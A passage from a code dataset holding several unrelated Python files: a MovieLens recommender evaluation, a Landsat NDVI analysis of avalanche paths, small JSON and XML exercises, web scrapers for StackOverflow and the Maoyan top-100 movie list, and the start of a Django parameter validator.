latencies[0][0]","sub_path":"eapt/resolver.py","file_name":"resolver.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"204065265","text":"from zoo.pipeline.api.keras.layers import *\nfrom zoo.models.recommendation import UserItemFeature\nfrom zoo.models.recommendation import NeuralCF\nfrom zoo.common.nncontext import init_nncontext\nimport matplotlib\nfrom sklearn import metrics\nfrom operator import itemgetter\nfrom bigdl.dataset import movielens\nfrom bigdl.util.common import *\nimport random\nimport pickle\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import col, udf, array, broadcast, log, explode, struct, collect_list\n\nsc = init_nncontext(\"NCF evaluation\")\nspark = SparkSession.builder \\\n .master(\"local[1]\") \\\n .appName(\"SparkByExamples.com\") \\\n .getOrCreate()\n\nmovielens_data = movielens.get_id_ratings(\"./data/movielens/\")\n\nrate_file = \"./data/movielens/ml-1m/ratings.dat\"\nratings = []\nwith open(rate_file) as infile:\n for cnt, line in enumerate(infile):\n x = line.strip().split(\"::\")\n y = list(map(lambda item: int(item), x))\n # y[3] = datetime.datetime.fromtimestamp(y[3])\n ratings.append(y)\n\nmin_user_id = np.min(movielens_data[:,0])\nmax_user_id = np.max(movielens_data[:,0])\nmin_movie_id = np.min(movielens_data[:,1])\nmax_movie_id = np.max(movielens_data[:,1])\nrating_labels= np.unique(movielens_data[:,2])\n\n# open a file, where you ant to store the data\nwith open(\"./data/movielens/train.pickle\", \"rb\") as f:\n train_data = pickle.load(f)\nwith open(\"./data/movielens/test.pickle\", \"rb\") as f:\n test_data = pickle.load(f)\n\nprint(min_user_id, max_user_id, min_movie_id, max_movie_id, rating_labels)\n\ndef build_sample(user_id, item_id, rating):\n sample = Sample.from_ndarray(np.array([user_id, item_id]), np.array([rating]))\n return UserItemFeature(user_id, item_id, sample)\n\ntrainPairFeatureRdds = sc.parallelize(train_data)\\\n .map(lambda x: build_sample(x[0], x[1], x[2]))\nvalPairFeatureRdds = sc.parallelize(test_data) \\\n .map(lambda x: build_sample(x[0], x[1], x[2]))\nvalPairFeatureRdds.cache()\n\ntrain_rdd= trainPairFeatureRdds.map(lambda pair_feature: pair_feature.sample)\nval_rdd= valPairFeatureRdds.map(lambda pair_feature: pair_feature.sample)\nval_rdd.persist()\n\nncf = NeuralCF(user_count=max_user_id,\n item_count=max_movie_id,\n class_num=5,\n hidden_layers=[20, 10],\n include_mf = False)\n\nncf.compile(optimizer= \"adam\",\n loss= \"sparse_categorical_crossentropy\",\n metrics=['accuracy'])\n\nloaded = ncf.load_model(\"./save_model/movie_ncf1.zoomodel\") #old\n\npredictions = ncf.predict_classes(val_rdd).collect()\n#print(predictions[1:10000])\n\nrecommendations = ncf.recommend_for_user(valPairFeatureRdds, 10)\n#for rec in recommendations.take(5): print(rec)\nuser_items_rec10 = recommendations.map(lambda x: [x.user_id, x.item_id]).collect()\nimport pandas\n\nrec_df = pandas.DataFrame(user_items_rec10, columns = ['uid', 'mid'])\nrec_df = rec_df.groupby('uid', as_index=False).agg(lambda x: list(x))\nprint(\"length:\")\nprint(len(rec_df))\n\ntest_df = pandas.DataFrame(test_data, columns=['uid', 'mid', 'rate', 'timestamp'])\ntest_df['rate'] = test_df['rate'] + 1\ntest_df['Rank'] = test_df.groupby('uid', as_index=False)['rate'].transform(lambda x: x.rank(ascending=False, method=\"first\"))\ntest_df = test_df[test_df['Rank'] < 11]\n#print(test_df.head(100))\ntest_df = test_df[['uid', 'mid']]\ntest_df = test_df.groupby('uid', as_index=False).agg(lambda x: list(x))\n\nprint(\"length:\")\nprint(len(test_df))\n\nrec_df = spark.createDataFrame(rec_df)\nrec_df.show(10)\n\ntest_df = spark.createDataFrame(test_df)\ntest_df.show(10)\n\njoined = rec_df.withColumnRenamed('mid', 'midrec').join(test_df, on=['uid'])\njoined.show(10)\n\ndef precision(prediction, groundtruth):\n sum = 0.0\n for ele in prediction:\n if ele in groundtruth:\n sum = sum + 1\n return sum/(len(prediction))\n\nprecision_udf = udf(lambda c1, c2: precision(c1, c2))\n\njoined=joined.withColumn(\"precision\", precision_udf('midrec', 'mid'))\n#def precision():\njoined.show(10, False)\nfrom pyspark.sql.functions import mean as _mean\n\nstats = joined.select(_mean(col('precision')).alias('mean')).collect()\nmean = stats[0]['mean']\nprint(\"precision @ k:\", mean)\n","sub_path":"src/bigdlmodels/evaluate_ncf.py","file_name":"evaluate_ncf.py","file_ext":"py","file_size_in_byte":4134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"586839918","text":"# Import packages and set working directory if needed here\nimport datetime\nimport glob\nimport os\n\nimport tempfile\n\nimport earthpy.spatial as es\nimport geopandas as gpds\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport numpy.ma as ma\nimport pandas as pd\nfrom pyproj import Proj, transform\nfrom rasterio import mask\nfrom rasterio.transform import from_origin\nimport rasterio as rio\nimport rasterio.plot\nimport rasterstats as rs\nimport tarfile\nimport warnings; \nwarnings.simplefilter('ignore')\n\nimport common_functions as common\n\nlandsat_file_root = os.path.join(common.original_raster_data, 'landsat_summer')\nlandsat_raw_data = os.path.join(common.original_raster_data, 'landsat_raw')\ndata_year_list = ['2008', '2009', '2010', '2011', '2012', '2013', '2014', '2015', '2016', '2017', '2018']\n\navalanche_overlap_shape = None\n\n# This should match the qa layer\nqa_match = 'pixel_qa'\n\n# Set an elevation threshold, in meters, to limit our elevation for our dNDVI analysis\nminimum_elevation_threshold = 1000\nmaximum_elevation_threshold = 3000\n\nrunning_max_dndvi = None\n\n# The order which we will be concatenating our tifs\ncolor_order = ['red', 'green', 'blue', 'nir']\n\nndvi_by_year = {}\n\nmean_below_thresh = pd.DataFrame(columns=[\"year\", \n \"mean_ndvi_in_slide\", \n \"mean_ndvi_out_of_slide\", \n \"mean_dndvi_in_slide\", \n \"mean_dndvi_out_of_slide\", \n \"snow_depth\"])\n \nfile_list = glob.glob(os.path.join(landsat_file_root, \"L*\"))\ntotal_array_count = 0\nrunning_ndvi_sum_array = None\nonly_analyze_version_number = None\navalanches_only = None\n\nband_colors_landsat_versions = {\n '7':{ \n 'blue':'band1',\n 'green':'band2',\n 'red':'band3',\n 'nir':'band4'\n },\n '8':{ \n 'blue':'band2',\n 'green':'band3',\n 'red':'band4',\n 'nir':'band5'\n }\n }\n\ndef open_and_crop_geotiff(geotiff_path, out_path, crop_by):\n \"\"\"\n Open geotiff and crop to the extent of the crop_by geodataframe\n \n Parameters\n ----------\n geotiff_path: string\n Path of the input geotiff to be cropped\n out_path: string\n Target path to write the output to\n crop_by: pandas geodataframe\n Geodataframe or shape to crop by \n \"\"\"\n with rio.open(geotiff_path) as src:\n # Reproject our shape to whatever projection the landsat data is in\n src_meta = src.meta.copy()\n crop_by_reprojected = crop_by.to_crs(src.crs)\n band_masked, transform_cropped = mask.mask(src, crop_by_reprojected.geometry, crop=True)\n src_meta['transform'] = transform_cropped\n print(transform_cropped)\n src_meta['width'] = band_masked.shape[2]\n src_meta['height'] = band_masked.shape[1]\n with rasterio.open(out_path, 'w', **src_meta) as dst:\n dst.write(band_masked) \n \n\ndef create_archive_from_tgz(zipped_data_dir, target_data_dir):\n \"\"\"\n Unzip the tgz files that are in the zipped_data_folder and move them to the\n target_dir only if they don't already exist in the target_dir.\n \n Parameters\n ----------\n zipped_data_dir: string\n Source directory\n target_dir: string\n Target directory\n \"\"\"\n file_list = glob.glob(os.path.join(zipped_data_dir, \"*.tar.gz\"))\n print(\"Number of files found: %d\" % len(file_list))\n files_in_data_dir = [os.path.basename(base_name) for base_name in glob.glob(os.path.join(target_data_dir, \"*\"))]\n print(\"Number of files already present: %d\" % len(files_in_data_dir))\n files_to_upload = [file_to_unzip \n for file_to_unzip \n in file_list \n if os.path.basename(file_to_unzip.replace(\".tar.gz\", \"\"))\n not in files_in_data_dir] \n print(\"Number of files to upload: %d\" % len(files_to_upload))\n for file_name in files_to_upload:\n with tempfile.TemporaryDirectory() as temporary_directory:\n scene_name = unzip_file(file_name, target_data_dir=temporary_directory) \n band_list = glob.glob(os.path.join(temporary_directory, scene_name, \"*.tif\"))\n landsat_version = landsat_path_to_version(scene_name)\n bands_to_save = [i for i in band_colors_landsat_versions[landsat_version].values()] + [\"qa\"]\n band_list = [fname \n for fname in band_list \n for bands_to_save_match in bands_to_save \n if bands_to_save_match in fname]\n scene_directory = os.path.join(target_data_dir, scene_name)\n os.mkdir(scene_directory)\n for band in band_list:\n band_basename = os.path.basename(band)\n open_and_crop_geotiff(band, os.path.join(scene_directory, band_basename), common.study_area_box_gdf)\n \ndef unzip_file(file_name, target_data_dir=\"./\"): \n \"\"\"\n Unzip all tgz files in file_list and save to target_data_dir. Each file will\n be saved into its own directory, named the same as the .tgz name, without\n the extension.\n \n Parameters\n ----------\n file_name: string\n Path of the file to unzip\n target_data_dir: str\n Directory to put the files into\n \"\"\"\n tar = tarfile.open(file_name, \"r:gz\")\n file_base_no_ext = os.path.basename(file_name.replace(\".tar.gz\", \"\"))\n directory_name = os.path.join(target_data_dir, file_base_no_ext)\n tar.extractall(path=directory_name)\n tar.close()\n return file_base_no_ext\n\n\ndef mask_clouds(qa_arr, landsat_ver=\"8\"):\n \"\"\"\n Creates a cloud mask given a qa_raster.\n \n Parameters\n ----------\n qa_arr: ndarray\n A qa raster containing information about cloud cover.\n landsat_ver: str\n A string representation of the landsat version.\n \n Returns\n ----------\n cloud_mask: ndarray\n A boolean array the same shape as qa_raster containing \n True values where clouds are present and False values \n where there are no clouds.\n \"\"\" \n if landsat_ver == \"8\":\n # Much of the terrain was being marked as cloud with the cloud_shadow and cloud \n # mask values, so had to only mask high confidence clouds.\n cloud_shadow = []#[328, 392, 840, 904, 1350]\n cloud = []#[352, 368, 416, 432, 480, 864, 880, 928, 944, 992]\n high_confidence_cloud = [480, 992]\n high_confidence_cirrus = [834, 836, 840, 848, 864, 880, 898, 900, 904, 912, 928, 944, 992]\n snow_ice = [336, 368, 400, 432, 848, 880, 912, 944, 1352]\n water = [324, 388, 836, 900, 1348]\n combined_list = list(set(cloud_shadow + \n cloud + \n high_confidence_cloud + \n high_confidence_cirrus + \n snow_ice + \n water))\n elif landsat_ver == \"7\":\n # Much of the terrain was being marked as cloud with the cloud_shadow and cloud \n # mask values, so had to only mask high confidence clouds.\n cloud_shadow = []#[72, 136]\n cloud = [] #[96, 112, 160, 176, 224]\n low_confidence_cloud = [] #[66, 68, 72, 80, 96, 112]\n medium_confidence_cloud = [] #[130, 132, 136, 144, 160, 176]\n high_confidence_cloud = [224]\n snow_ice = [80, 112, 144, 176]\n water = [68, 132]\n combined_list = list(set(cloud_shadow + \n cloud + \n low_confidence_cloud + \n medium_confidence_cloud + \n high_confidence_cloud + \n snow_ice + \n water))\n else:\n print(\"Landsat version %s not recognized. No cloud removal performed.\" % landsat_ver)\n combined_list = []\n # Create a mask with True values indicating non-cloud pixels\n all_masked_values = np.array(combined_list)\n cloud_mask = np.isin(qa_arr, all_masked_values)\n \n return cloud_mask\n\n\ndef files_from_pattern(pattern, expect_single_file=False):\n \"\"\"\n From a given pattern, retrieve the filenames. If expect_single_file is True,\n raise an error if multiple files are returned. If no files are returned, print\n a message.\n \n TODO: expand pattern to regex instead of only wildcards.\n \n Parameters\n ----------\n pattern: str\n A pattern to match filename. At this time, only wildcards are accepted (no regular\n expressions).\n expect_single_file: bool\n When True, a valueError is raised if more than one file is returned.\n \n Returns\n ----------\n [file names]: list\n A list of returned file names.\n \"\"\"\n returned_files = glob.glob(pattern)\n if len(returned_files) == 0:\n print(\"No files found for pattern %s.\" % pattern)\n if expect_single_file and len(returned_files) > 1:\n raise ValueError(\"Expecting a single value to be returned \"\n \"and found %d values for pattern %s.\" \n % (len(returned_files), pattern))\n return returned_files\n\ndef scene_path_to_year(path):\n \"\"\"\n Determine the year given a scene ID\n \n Parameters\n ----------\n path: string\n Landsat scene ID (see https://landsat.usgs.gov/landsat-collections#Prod%20IDs)\n \n Returns\n ----------\n [year]: string\n Landsat year\n \"\"\"\n return os.path.basename(path)[10:14]\n\ndef landsat_path_to_version(path):\n \"\"\"\n Determine the landsat version given a scene ID\n \n Parameters\n ----------\n path: string\n Landsat scene ID (see https://landsat.usgs.gov/landsat-collections#Prod%20IDs)\n \n Returns\n ----------\n [year]: string\n Landsat version (single digit string)\n \"\"\"\n return os.path.basename(path)[3:4]\n\n\ndef generate_ndvi():\n ndvi_df = pd.DataFrame()\n\n # Loop through each year in the outer loop\n for year in data_year_list: \n print(\"Analyzing year %s\" % year)\n year_list_subset = [file for file in file_list if scene_path_to_year(file) == year]\n if not year_list_subset:\n print(\"No files found for year %s\" % (year))\n continue\n accumulated_ndvi_arrays = []\n \n # Loop through each file for the specified year in the inner loop\n for file in year_list_subset:\n file_basename = os.path.basename(file)\n landsat_version_number = landsat_path_to_version(file_basename)\n \n # If this landsat version number is not to be analyzed, continue to the next iteration\n if only_analyze_version_number is not None and only_analyze_version_number == landsat_version_number:\n continue\n band_colors = band_colors_landsat_versions[landsat_version_number] \n accumulated_bands_list = []\n accumulated_bands_list_unmasked = [] \n\n # Get QA layer to create our cloud mask\n qa_file_name = files_from_pattern(os.path.join(file, \"*%s*\" % qa_match), \n expect_single_file=True)[0]\n\n with rio.open(qa_file_name) as src:\n \n # Reproject our shape to whatever projection the landsat data is in\n landsat_crs = src.crs\n landsat_affine = src.transform\n qa_arr = src.read()\n qa_arr = np.squeeze(qa_arr)\n cloud_mask = mask_clouds(qa_arr, landsat_ver=landsat_version_number)\n\n # Loop through the colors necessary to create NDVI\n for color in color_order:\n band_file_name = files_from_pattern(os.path.join(file, \"*%s*\" % band_colors[color]), \n expect_single_file=True)[0]\n with rio.open(band_file_name) as src:\n \n # Reproject our shape to whatever projection the landsat data is in\n band = src.read()\n\n # Cast to float so we can assign nan values\n band = np.squeeze(band).astype(\"float\")\n \n # Mask invalid values\n band[band == src.nodatavals] = False\n \n # Remove the banding effect due to sattelite malfunction with landsat 7 after 2003\n if landsat_version_number == 7 and int(year) > 2003:\n band[band == 0] = False\n \n # Mask clouds \n band[cloud_mask] = False\n \n accumulated_bands_list.append(band) \n \n # Create arrays from our cloud-masked and no-cloud-masked band lists\n accumulated_bands_arr = np.array(accumulated_bands_list)\n\n # Calculate the NDVI array and append to list\n ndvi_arr = common.calculate_NDVI(accumulated_bands_arr)\n ndvi_df = ndvi_df.append({\"year\": year, \n \"fname\": file_basename, \n \"RGB_arr\": accumulated_bands_arr, \n \"NDVI_arr\": ndvi_arr, \n \"landsat_ver\": landsat_version_number,\n \"valid_vals\": band[band != False].size\n }, \n ignore_index=True)\n\n # Metadata with pandas is unfortunate; would move to something that handles metadata more robustly like xarray\n # but there's additional overhead/complexity with that. Don't copy this dataframe otherwise this metadata will\n # disappear in the copy.\n ndvi_df.affine = landsat_affine\n ndvi_df.crs = landsat_crs\n\n return ndvi_df\n\n\ndef generate_dndvi(ndvi_df, avalanche_overlap_shape):\n shapefile_below_threshold = avalanche_overlap_shape[\n (avalanche_overlap_shape['height_bucket'] < maximum_elevation_threshold) & \n (avalanche_overlap_shape['height_bucket'] > minimum_elevation_threshold)]\n\n mean_below_thresh = pd.DataFrame()\n\n ndvi_year = ndvi_df.groupby(by=\"year\")\n for year, group in ndvi_year:\n ndvi_vals = np.array(group['NDVI_arr'].values.tolist())\n annual_ndvi_array = np.nanmax(ndvi_vals, axis=0)\n ndvi_below_elevation_thresh = common.rasterstats_grouped_by_height(shapefile_below_threshold, \n annual_ndvi_array, \n ndvi_df.affine, \n \"mean\")\n mean_below_thresh = mean_below_thresh.append(\n {\n \"year\": year,\n \"mean_NDVI_in_slide\": ndvi_below_elevation_thresh\n .replace([np.inf, -np.inf], np.nan)['mean_avalanche']\n .mean(), \n \"mean_NDVI_out_of_slide\": ndvi_below_elevation_thresh\n .replace([np.inf, -np.inf], np.nan)['mean_no_avalanche']\n .mean(), \n \"snow_depth\": common.snowfall_data_df\n .loc[common.snowfall_data_df['Year'] == int(year), \"Total\"]\n .iat[0]\n },\n ignore_index=True\n )\n mean_below_thresh['mean_dNDVI_in_slide'] = mean_below_thresh['mean_NDVI_in_slide'].diff()\n mean_below_thresh['mean_dNDVI_out_of_slide'] = mean_below_thresh['mean_NDVI_out_of_slide'].diff()\n \n return mean_below_thresh\n\ndef generate_avalanche_shapes(ndvi_crs):\n # Generate a single shapefile that contains the union of the\n # avalanche path and the elevation buckets for our entire study area\n # This step takes forever when you run it for the first \n # time and if the geojson isn't available on disk\n return common.generate_unioned_avalanche_overlay(ndvi_crs)\n\n\ndef ndvi_analysis(ndvi_df, avalanche_overlap_shape):\n # The rgb image that has the most valid values to be used as the background for plotting\n best_rgb = ndvi_df.loc[ndvi_df['valid_vals'].idxmax()]['RGB_arr']\n\n # Create a 3-d array and take the mean over the 0th dimension (time)\n ndvi_vals = np.array(ndvi_df['NDVI_arr'].values.tolist())\n mean_ndvi_array = np.nanmax(ndvi_vals, axis=0)\n \n # This is the stat we are using in our zonal stats - taking the spatial mean\n stat = \"mean\"\n slide_paths_elev_buckets = avalanche_overlap_shape[~(pd.isna(avalanche_overlap_shape['avalanche_id']))]\n ndvi_slide_paths = common.get_zonal_stats_dataframe(slide_paths_elev_buckets, \n mean_ndvi_array, \n ndvi_df.affine, \n stat)\n _, _ = common.plot_rgb_and_vector(best_rgb, \n ndvi_df.crs,\n ndvi_slide_paths,\n \"Maximum NDVI in Slide Path Height Intervals\\n(Landsat Fig. 1)\", \n \"Imagery: Landsat, 2008-2018, \" + \\\n \"Avalanche Shapes: Utah Automated Geographic Reference Center\",\n vmax=1,\n vmin=-1,\n color=stat)\n\n # Find the deviation from the slide path NDVI and the remainder of the height bin\n # plot the result with a colormap\n ndvi_elevation_buckets = common.rasterstats_grouped_by_height(avalanche_overlap_shape, \n mean_ndvi_array, \n ndvi_df.affine, \n stat)\n slide_paths_elev_buckets[\"NDVI_deviation\"] = np.nan\n\n # Loop through the different elevation buckets\n for _, row in ndvi_elevation_buckets.iterrows():\n\n # Isolate just the slide paths in this elevation bucket\n is_in_height_bucket = slide_paths_elev_buckets['height_bucket'] == row['height_bucket']\n\n # Subtract the mean no-avalanche NDVI from the equivalent elevation bucket within the slide paths \n slide_paths_elev_buckets.loc[is_in_height_bucket, \"NDVI_deviation\"] = \\\n ndvi_slide_paths[stat] - row[stat + '_no_avalanche']\n\n _, _ = common.plot_rgb_and_vector(best_rgb, \n ndvi_df.crs,\n slide_paths_elev_buckets,\n \"Deviation From Typical Elevation NDVI\\n(Landsat Fig. 2)\", \n \"Imagery: Landsat Avalanche Shapes: Utah Automated Geographic Reference Center\",\n vmax=.25,\n vmin=-.25,\n color=\"NDVI_deviation\")\n\n common.plot_bar(ndvi_elevation_buckets[ndvi_elevation_buckets['height_bucket'] != 0], \n \"height_bucket\", \n \"Elevation (meters)\", \n ['mean_avalanche', 'mean_no_avalanche'], \n \"NDVI\", \n \"Maximum NDVI in Avalanche-Prone Areas vs Low Avalanche-Risk Areas\\n\" + \\\n \"maximum of %d Landsat datasets\\n\" % len(ndvi_df) + \\\n \"(Landsat Fig. 3)\", \n \"Landsat, 2008-2018\",\n series_names=['Within Avalanche Paths', \n 'Outside Avalanche Paths'])\n\n\ndef dndvi_analysis(dndvi_df_below_altitude_thresh):\n # First row is na since we don't have a previous NDVI to compare it to. Drop this.\n dndvi_df_below_altitude_thresh_no_na = dndvi_df_below_altitude_thresh.dropna(axis=0)\n dndvi_df_below_altitude_thresh_no_na.set_index(\"year\")\n ax1 = common.plot_bar(dndvi_df_below_altitude_thresh_no_na, \n 'year', \n 'Year', \n ['mean_dNDVI_in_slide','mean_dNDVI_out_of_slide'], \n \"Mean dNDVI Between Years\\n(positive indicates growth)\", \n \"dNDVI Below %s Meters and above %s Meters vs Snowfall\\n(Landsat Fig. 5)\"\n % (maximum_elevation_threshold, minimum_elevation_threshold), \n \"Imagery Data: Landsat 2008-2018\\n\" + \\\n \"Snowfall Data: Utah Department of Transportation\\n\" + \\\n \"Avalanche information: Utah Automated Geographic Reference Center\", \n series_names=[\"Annual dNDVI In Slide Paths\", \"Annual dNDVI Outside Slide Paths\"],\n display_plot=False)\n ax2 = ax1.twinx()\n dndvi_df_below_altitude_thresh_no_na['snow_depth'].plot(x='year', ax=ax2)\n ax2.set_ylabel('Total Snowfall in Prior Winter (inches)', fontsize=22)\n plt.show()\n\n\ndef calculate_maximum_diff(ndvi_df):\n # Get absolute max dNDVI for each pixel in our study period\n combined_arr = np.array(ndvi_df['NDVI_arr'].values.tolist())\n absolute_max_diff_ndvi = np.nanmax(combined_arr, axis=0) - np.nanmin(combined_arr, axis=0)\n _ = common.plot_array_and_vector(absolute_max_diff_ndvi, \n ndvi_df.crs,\n common.avalanche_shapes_object,\n \"Maximum Absolute Difference in NDVI, 2008-2018\\n(Landsat Fig. 4)\", \n \"Imagery: Landsat, 2008-2018\",\n vmax=2,\n vmin=0,\n cmap_array='OrRd')","sub_path":"landsat_analysis.py","file_name":"landsat_analysis.py","file_ext":"py","file_size_in_byte":22443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"322552425","text":"import json\n\n\ndef write_order_to_json(item, quantity, price, buyer, date):\n add_data = {'item': item, 'quantity': quantity, 'price': price, 'buyer': buyer, 'date': date}\n try:\n with open('orders.json', 'r') as f:\n data = json.loads(f.read())\n data['data'].append(add_data)\n except FileNotFoundError:\n data = {'data': [add_data]}\n with open('orders.json', 'w') as f:\n f.write(json.dumps(data, indent=4))\n\n\nwrite_order_to_json('Toys', 11, 565, 'HNM', '11.01.18')\n","sub_path":"HW2/task2/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"282627016","text":"from selenium import webdriver\n\nimport bs4 as bs\n\nquestion = input(\"question >>> \")\n\n_driver = None\n\ndef main () :\n\tSTART_PHANTOM()\n\n\twords = question.split(\" \")\n\tweb_question = \"\"\n\tfor word in words :\n\t\tweb_question += (word + \"+\")\n\tweb_question = web_question[:-1]\n\tprint (\"searching >>> \" + web_question)\n\n\t_driver.get(\"https://stackoverflow.com/search?q=\" + web_question)\n\t_driver.find_element_by_class_name(\"question-hyperlink\").click()\n\n\tsrc = _driver.page_source\n\n\tsoup = bs.BeautifulSoup(src,\"lxml\")\n\n\ta = soup.find('div', class_='answer accepted-answer')\n\tfinal = a.find('div', class_='post-text')\n\n\twith open(\"data.txt\",\"w\") as f :\n\t\tf.write(final.text)\n\t\tf.close()\n\n\tprint(\"### ANSWER ###\")\n\tprint(final.text)\n\n\t_driver.quit()\n\t\n\n\ndef START_CHROME () :\n\tglobal _driver\n\t\n\tfrom selenium.webdriver.chrome.options import Options\n\n\tchrome_options = Options() \n\tchrome_options.add_argument(\"--headless\")\n\tchrome_options.binary_location = '/Applications/Google Chrome Canary.app/Contents/MacOS/Google Chrome Canary'\n\t\n\t_driver = webdriver.Chrome(executable_path= \"/Users/machina/Desktop/WebScraping/StackOverflowBot/chrome_driver\" , chrome_options=chrome_options)\n\t\n\ndef START_PHANTOM () :\n\tglobal _driver\n\n\t_driver = webdriver.PhantomJS()\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"stackoverflowcli/stackoverflowcli.py","file_name":"stackoverflowcli.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"270616161","text":"import urllib.request\nimport xml.etree.ElementTree as ET\n\nurl = input('Enter location: ')\n\ncount = 0\nsum = 0\nprint('Retrieving', url)\nuh = urllib.request.urlopen(url)\ndata = uh.read()\nprint('Retrieved', len(data), 'characters')\ntree = ET.fromstring(data)\n\nvalues = tree.findall('.//count')\n\nfor value in values:\n count = count + 1\n text = value.text\n sum = sum + int(text)\n\nprint('Count:', count)\nprint('Sum:', sum)\n\n","sub_path":"student/geoxml.py","file_name":"geoxml.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"364527262","text":"\"\"\"\r\n 猫眼TOP100榜单排名\r\n 2019-10-09\r\n 邱深知\r\n\"\"\"\r\n\r\nfrom requests.exceptions import RequestException\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\n\r\ndef get_one_page(url):\r\n headers = {\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36\"\r\n }\r\n try:\r\n response = requests.get(url,headers=headers)\r\n if response.status_code == 200:\r\n return response.content.decode()\r\n return None\r\n except RequestException:\r\n return None\r\n\r\ndef parse_one_page(html):\r\n soup = BeautifulSoup(html,'lxml')\r\n title = re.compile('title=\"(.*?)\"')\r\n imgst = re.compile('data-src=\"(.*?)\"')\r\n shangyin = re.compile('<p class=\"releasetime\">(.*?)</p>')\r\n zhuyans = re.compile('<p class=\"star\">\\S*\\s*(.*?)\\s*\\S*</p>')\r\n pingfen1 = re.compile('<p class=\"score\"><i class=\"integer\">(.*?)</i>')\r\n pingfen2 = re.compile('</i><i class=\"fraction\">(.*?)</i></p>')\r\n\r\n\r\n #标题\r\n page = soup.select('div > div > div.movie-item-info > p.name > a')\r\n ps = re.findall(title,str(page))\r\n # 图片\r\n imgs = soup.select('a > img.board-img')\r\n imgss = re.findall(imgst, str(imgs))\r\n #主演\r\n zhuyan = soup.select('div > div > div.movie-item-info > p.star')\r\n zhuyanss = re.findall(zhuyans,str(zhuyan))\r\n #上映时间\r\n shangying = soup.select('div > div > div.movie-item-info > p.releasetime')\r\n shanyings = re.findall(shangyin,str(shangying))\r\n #评分\r\n pingfens = soup.select('div > div > div.movie-item-number.score-num > p')\r\n pinfen1 = re.findall(pingfen1,str(pingfens))\r\n pinfen2 = re.findall(pingfen2,str(pingfens))\r\n\r\n\r\n for title,imgss,zhuya,shanyin,pinfen1,pinfen2 in zip(ps,imgss,zhuyanss,shanyings,pinfen1,pinfen2):\r\n # print(\"标题:\"+title)\r\n # print(\"图片:\"+imgss)\r\n # print(zhuya)\r\n # print(shanyin)\r\n # print(\"评分:\"+pinfen1+pinfen2)\r\n text = \"标题:\"+title+\"\\n\"+\"图片:\"+imgss+\"\\n\"+zhuya+\"\\n\"+shanyin+\"\\n\"+\"评分:\"+pinfen1+pinfen2+\"\\n\"\r\n with open('TOP100排名.txt', 'a', encoding='utf-8')as f:\r\n f.write(text)\r\n f.close()\r\n\r\n\r\ndef main():\r\n pages = 0\r\n # try:\r\n while True:\r\n if pages >=101 :\r\n print(\"已经爬取10页!\")\r\n break\r\n else:\r\n url = \"https://maoyan.com/board/4?offset={}\".format(pages)\r\n html = get_one_page(url)\r\n parse_one_page(html)\r\n pages += 10\r\n print(url)\r\n # except:\r\n # print(\"爬取%d\"%pages+\"成功!\")\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"278596886","text":"__author__ = 'kakshilshah'\nimport constants\nimport re\nfrom api.models import *\nfrom django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned\n\nfrom responseParser import ResponseParser\nclass Validator(object):\n \"\"\"A validator object validates parameters and stores appropriate response.\n Attributes:\n statusCode: A string representing the customer's name.\n parameters: A float tracking the current balance of the customer's account.\n message:\n \"\"\"\n def __init__(self,request,parametersList):\n self.request = request\n self.requestQueryDictionary = self.convertToDict(request.POST)\n self.parametersList = parametersList\n\n def applyConstraints(self,constraintsList):\n self.constraintsList = constraintsList\n\n def isValidated(self):\n\n if not len(self.parametersList) == len(self.constraintsList):\n return False\n\n for i in range(0,len(self.parametersList)):\n\n parameterName = self.parametersList[i]\n parameterConstraint = self.constraintsList[i]\n\n if parameterConstraint == constants.TYPE_NOTNULL:\n if not parameterName in self.requestQueryDictionary:\n return False\n\n elif parameterConstraint == constants.TYPE_TEXT:\n if not parameterName in self.requestQueryDictionary:\n return False\n if len(self.requestQueryDictionary[parameterName]) == 0:\n return False\n\n elif parameterConstraint == constants.TYPE_PHONE:\n if not parameterName in self.requestQueryDictionary:\n return False\n if not len(self.requestQueryDictionary[parameterName]) == 10:\n return False\n\n elif parameterConstraint == constants.TYPE_DEVICE:\n if not parameterName in self.requestQueryDictionary:\n return False\n if not self.requestQueryDictionary[parameterName] in constants.DEVICE_TYPES:\n return False\n\n elif parameterConstraint == constants.TYPE_EMAIL:\n if not parameterName in self.requestQueryDictionary:\n return False\n return self.validateEmail(self.requestQueryDictionary[parameterName])\n\n elif parameterConstraint == constants.TYPE_LATLONG:\n if not parameterName in self.requestQueryDictionary:\n return False\n return self.validateLatLong(self.requestQueryDictionary[parameterName])\n\n elif parameterConstraint == constants.TYPE_USERID:\n if not parameterName in self.requestQueryDictionary:\n return False\n return self.validateUserID(self.requestQueryDictionary[parameterName])\n\n\n return True\n\n def getParametersDictionary(self):\n return self.requestQueryDictionary\n\n def getErrorBlock(self):\n if not len(self.parametersList) == len(self.constraintsList):\n return ResponseParser.getParsedErrorMessage(constants.ERROR_INTERNAL_PARAMETER)\n\n\n for i in range(0,len(self.parametersList)):\n parameterName = self.parametersList[i]\n parameterConstraint = self.constraintsList[i]\n\n if parameterConstraint == constants.TYPE_NOTNULL:\n if not parameterName in self.requestQueryDictionary:\n return ResponseParser.getParsedValidMessage(self.requestQueryDictionary[parameterName])\n\n elif parameterConstraint == constants.TYPE_TEXT:\n if not 